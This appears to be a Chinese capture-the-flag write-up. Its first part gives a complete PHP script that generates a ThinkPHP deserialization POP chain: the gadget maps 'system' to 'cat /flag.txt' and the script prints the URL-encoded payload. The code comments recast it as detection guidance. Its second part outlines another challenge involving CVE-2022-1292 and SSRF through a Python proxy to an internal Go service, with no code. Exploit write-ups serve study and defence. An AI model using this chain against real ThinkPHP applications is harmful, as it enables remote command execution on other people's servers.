发布时间:2024-05-02 15:01
源码通过 www.zip 泄露,直接使用网上公开的反序列化利用链(POP 链)即可。
namespace think\model\concern;
/**
 * Stand-in for the framework trait of the same name, declared only so that
 * serialize() emits an object carrying these three property values.
 *
 * Nothing in this listing reads the properties; they matter only to whatever
 * code later restores the object with unserialize(). The property names
 * presumably mirror the real framework trait (not shown here; confirm against
 * the deployed version).
 *
 * Defender's note: $withAttr pairs a field name with the name of a callable,
 * and $data supplies the string for that same field. A serialized blob in
 * which attacker-chosen strings sit in both places is the signature to look
 * for when reviewing captured requests.
 */
trait Attribute
{
    // Field "key" -> nested value; listed in $json below.
    private $data = [
        "key" => [
            "key1" => "cat /flag.txt",
        ],
    ];

    // Same "key"/"key1" path as $data, holding a function name instead of a value.
    private $withAttr = [
        "key" => [
            "key1" => "system",
        ],
    ];

    // Names "key" as a JSON field.
    protected $json = ["key"];
}
namespace think;
/**
 * Stand-in for the abstract base class in the `think` namespace, reduced to
 * the properties whose values end up in the serialized output.
 *
 * The constructor only fixes a set of boolean flags and stores its argument
 * in $table. The framework code that reads these fields after unserialize()
 * is not part of this listing, so which flags are strictly required should be
 * confirmed against the deployed framework version.
 *
 * Defender's note: every value here is restored verbatim by unserialize() in
 * the receiving application. The root cause is therefore the unserialize()
 * call on untrusted input, not any one of these properties.
 */
abstract class Model
{
    use model\concern\Attribute;

    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    protected $jsonAssoc;

    /**
     * @param mixed $obj Value stored as-is in $table. The script below passes
     *                   another Pivot instance for the outer object.
     */
    function __construct($obj = '')
    {
        // All four flags take the same value; only $withEvent is switched off.
        $this->lazySave = $this->exists = $this->force = $this->jsonAssoc = true;
        $this->withEvent = false;

        // Not type-checked here: may be a string or, as used below, an object.
        $this->table = $obj;
    }
}
namespace think\model;
use think\Model;
/**
 * Concrete subclass with no members of its own. Model is abstract, so a
 * concrete class is needed to instantiate and serialize it.
 *
 * The fully qualified name think\model\Pivot is what appears in the
 * serialized string, which makes it a practical search term in request logs.
 */
class Pivot extends Model {}
// Build two instances: the inner one uses the default constructor argument,
// the outer one stores the inner object in its $table property.
$inner = new Pivot();
$outer = new Pivot($inner);

// Print the object graph as a URL-encoded PHP serialization string.
//
// Defender's view: this string has an effect only where an application passes
// request data to unserialize(). Audit for such calls; where deserialization
// cannot be removed, restrict it with the allowed_classes option of
// unserialize(), or switch the transport format to JSON. URL-encoded
// serialized-object markers naming think\model\Pivot in request parameters or
// cookies are a detection anchor.
$serialized = serialize($outer);
echo urlencode($serialized);
考点:
CVE-2022-1292
SSRF
项目后端由 Python 和 Go 两部分组成:Python 服务部署在外网,Go 服务位于内网,只能经由 Python 转发访问。
先看python,一共有四个路由:
/
为主界面
/getcrt
生成一个x509证书
/createlink
调用c_rehash创建证书链接
/proxy
通过代理访问go内网服务